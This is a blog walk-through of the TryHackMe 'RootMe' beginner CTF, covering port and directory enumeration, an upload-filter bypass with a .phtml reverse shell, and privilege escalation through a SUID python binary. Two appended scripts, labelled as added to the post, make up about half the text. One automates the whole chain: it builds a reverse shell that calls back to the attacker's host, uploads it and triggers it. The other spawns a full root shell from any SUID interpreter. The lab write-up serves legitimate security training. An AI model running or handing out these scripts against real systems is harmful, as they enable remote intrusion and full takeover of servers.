Kipkirui Victor
5 min read · Apr 1, 2021


TryHackMe Walk-through on RootMe

Hello guys, back again with another walk-through, this time on the RootMe CTF on tryhackme.com. This was an easy box, a CTF for beginners. Can you root me?

Let's get started right away. Make sure everything is up and running, but first a word on challenges like CTFs: the more tasks you solve, the more your self-confidence improves. These small successes give you energy and keep you motivated to pick increasingly complex challenges, which leads us to our next point. So keep going no matter how bad you think your skills are; you will improve and be the best.

Ready? As usual we start with enumeration: nmap -sC -sV -oA nmap/rootme <ip address> -v. Here -sC runs the default script set, -sV does version detection, -oA writes the results in all three nmap output formats (.nmap, .gnmap, .xml) with the prefix nmap/rootme (the nmap/ directory has to exist beforehand), and -v increases the verbosity. Below is a screenshot:

Figure 1.0

We find two open ports: 22 for SSH and 80 for a web server, in this case Apache. We can now check what is on the site by typing the IP address into your preferred browser, and this is what the page looks like:

Figure 1.1

Checking the source code, there is nothing interesting, so I started brute-forcing for hidden directories with gobuster. You can also use nikto, dirb or dirsearch; there are a lot of tools out there to help you, but here we use gobuster: gobuster dir -u http://<ip address>/ -w <wordlist> -x php,cgi,sh,txt, where -u is the URL, -w the wordlist (I used the one that ships with Kali Linux at /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt) and -x appends the listed extensions to every word, so files and not only directories are found. This is so awesome, you are going to like this:

Figure 1.2

Most of the hits come back with status code 301, which is just Apache redirecting a directory name to the same name with a trailing slash. Navigating through them I couldn't find anything interesting: /index.php is the home page, nothing much there; /uploads is empty, and that tells us something about what we are looking for: to get a shell on this machine we will have to upload something, like a file containing a PHP reverse shell, and it will be stored here under /uploads. Wow, this is so interesting, I am loving this. Finally we have /panel, and checking it we find a page to upload a file:

Figure 1.3

We are almost there. I tried uploading an image file and then an HTML file, and both were accepted. Next I tried to upload a PHP reverse shell script, but it failed: there is some kind of extension filtering, so I wasn't successful. After a lot of research I came across the .phtml extension, which is most commonly associated with PHP web pages, so I renamed my php-reverse-shell from .php to .phtml. The reason this works: the filter looks at the file name, but on Debian/Ubuntu the Apache mod_php handler (FilesMatch ".+\.ph(ar|p|tml)$") executes .php, .phar and .phtml alike, so a blacklist that only checks for .php leaves the other two executable. Make sure to change the IP address (and port) in the script to your machine's before uploading it to the server. Upload the file and it succeeds:

Figure 1.4

Going to the uploads directory we see that our reverse-shell script has been uploaded successfully. Now set up a netcat listener on the attacker machine on a port of your choice, the same port you put in the script: nc -lvnp 1234

Figure 1.5

Now execute the script: just click on it in the uploads folder and voilà, we have a shell back on our machine as the user www-data:

Figure 1.6
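The upload-and-trigger sequence above, as an added shell script that is not part of the original post and not TryHackMe's code. It models the extension check the panel appears to use as a hypothetical ".php"-only blacklist, picks the first name that the blacklist lets through but Apache's Debian/Ubuntu handler rule (.php, .phar, .phtml) still executes, writes a small proc_open-based reverse shell with your IP and port, uploads it and requests it while nc listens. The form field name fileToUpload and the handler path /panel/ are assumptions; read the real ones from the page source.

```sh
#!/bin/sh
# Added example, not code from the original post or from TryHackMe.
# Assumptions (not stated on the page): the upload form field is called
# "fileToUpload" and the upload handler lives at /panel/.

# served_as_php NAME: mirrors the Debian/Ubuntu mod_php handler rule
# FilesMatch ".+\.ph(ar|p|tml)$" -- names matching it run as PHP.
served_as_php() {
    case "$1" in
        ?*.php|?*.phar|?*.phtml) return 0 ;;
        *) return 1 ;;
    esac
}

# blocked_by_filter NAME: a hypothetical blacklist that rejects only
# names ending in ".php", the kind of check the panel appears to use.
blocked_by_filter() {
    case "$1" in
        *.php) return 0 ;;
        *) return 1 ;;
    esac
}

# bypass_name BASE: first extension the filter lets through but Apache
# still executes. Prints the file name, fails if none works.
bypass_name() {
    for ext in php phtml phar; do
        name="$1.$ext"
        if served_as_php "$name" && ! blocked_by_filter "$name"; then
            echo "$name"
            return 0
        fi
    done
    return 1
}

# make_payload IP PORT OUT: write a proc_open-based reverse shell. Unlike
# the "sh <&3" one-liner it does not assume the socket lands on fd 3, so
# it works under Apache and not only under php-cli.
make_payload() {
    cat > "$3" <<EOF
<?php
\$sock = fsockopen("$1", $2);
\$proc = proc_open("/bin/sh -i", array(0 => \$sock, 1 => \$sock, 2 => \$sock), \$pipes);
proc_close(\$proc);
EOF
}

# upload FILE TARGET_URL: POST the file to the panel (field name assumed).
upload() { curl -s -F "fileToUpload=@$1" "$2/panel/" >/dev/null; }

# trigger FILE TARGET_URL: request the uploaded file so PHP runs it; the
# request stays open for as long as the shell lives.
trigger() { curl -s "$2/uploads/$(basename "$1")" >/dev/null; }

# Usage: ./rootme_shell.sh http://<target-ip> <your-ip> [port]
main() {
    target="$1"; lhost="$2"; lport="${3:-1234}"
    name=$(bypass_name shell) || { echo "no usable extension" >&2; return 1; }
    make_payload "$lhost" "$lport" "$name"
    upload "$name" "$target"
    # hit the uploaded file once the listener is up so the shell connects back
    (sleep 2; trigger "$name" "$target") &
    nc -lvnp "$lport"
}

if [ $# -ge 2 ]; then main "$@"; fi
```

Note that shell.php.jpg and shell.php5 are not matched by the handler rule, so even if a filter lets them through they are served as plain files; the bypass needs a name that is both unfiltered and handled, which is exactly what .phtml is here.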

Congratulations if you have made it this far. Now it is time to look for the first flag, user.txt. After searching the directories manually I finally found it in /var/www, but to automate the task I used the find command, which was much faster: find / -name user.txt 2>/dev/null (the redirect hides the permission-denied noise from directories www-data cannot read).

Figure 1.7

Navigating to that folder we find our flag. Submit it and let's move on to the next one.

The next flag requires escalating our privileges to read root.txt, so we look for files with the SUID bit set. First I uploaded linpeas.sh, made it executable and ran it; it enumerates potential privilege-escalation vectors on the target, and luckily it did not take long to find a SUID binary, /usr/bin/python, as shown below:

Figure 1.8

With that in mind, I used the SUID bit on /usr/bin/python to read root.txt in the root directory: /usr/bin/python -c 'print(open("/root/root.txt").read())'. Because the binary is SUID root, the interpreter runs with an effective uid of 0, and open() is checked against the effective uid, so the read is allowed even though our real uid is still www-data. Boom! We have our second flag, and that concludes our journey for this walk-through.

Figure 1.9
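The privilege-escalation step, as an added shell script that is not part of the original post. It goes a little beyond the post: besides the manual SUID enumeration (the same vector linpeas reported, without uploading a tool) and the one-file read the author used, it shows how the same SUID python yields a full root shell by first making the real uid root with os.setuid(0), which the kernel permits because the effective uid is already 0. It assumes Linux with GNU find; the interpreter path is passed in rather than hard-coded.

```sh
#!/bin/sh
# Added example, not commands from the original post. Assumes Linux and
# GNU find.

# is_suid FILE: true when the set-uid bit is on FILE.
is_suid() { [ -u "$1" ]; }

# suid_root_binaries: every set-uid file owned by root. Stderr is silenced
# because find hits many directories www-data cannot read.
suid_root_binaries() {
    find / -perm -4000 -type f -user root 2>/dev/null
}

# read_as_root PYTHON FILE: the post's technique. The interpreter runs with
# effective uid 0 and open() is checked against the effective uid, so a
# root-only file is readable although the real uid is still www-data.
read_as_root() {
    "$1" -c "print(open('$2').read())"
}

# root_shell PYTHON: go further than one file. os.setuid(0) sets the real
# uid to root as well (allowed because euid is 0), then exec a shell, so
# the shell does not drop privileges for having ruid != euid.
root_shell() {
    "$1" -c 'import os; os.setuid(0); os.execl("/bin/sh", "sh")'
}

# Usage: ./suid_python.sh enum             -> list SUID-root files
#        ./suid_python.sh /usr/bin/python  -> root shell via that interpreter
if [ $# -eq 1 ] && [ "$1" = "enum" ]; then
    suid_root_binaries
elif [ $# -eq 1 ]; then
    is_suid "$1" && root_shell "$1"
fi
```

When the enumeration lists an interpreter or another binary that can spawn a process, the root shell is the thing to go for: it lets you read root.txt and anything else, instead of repeating the one-file read for every path of interest.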

Thank you guys, I hope this was fun. See you in the next walk-through, and don't forget to leave a comment.
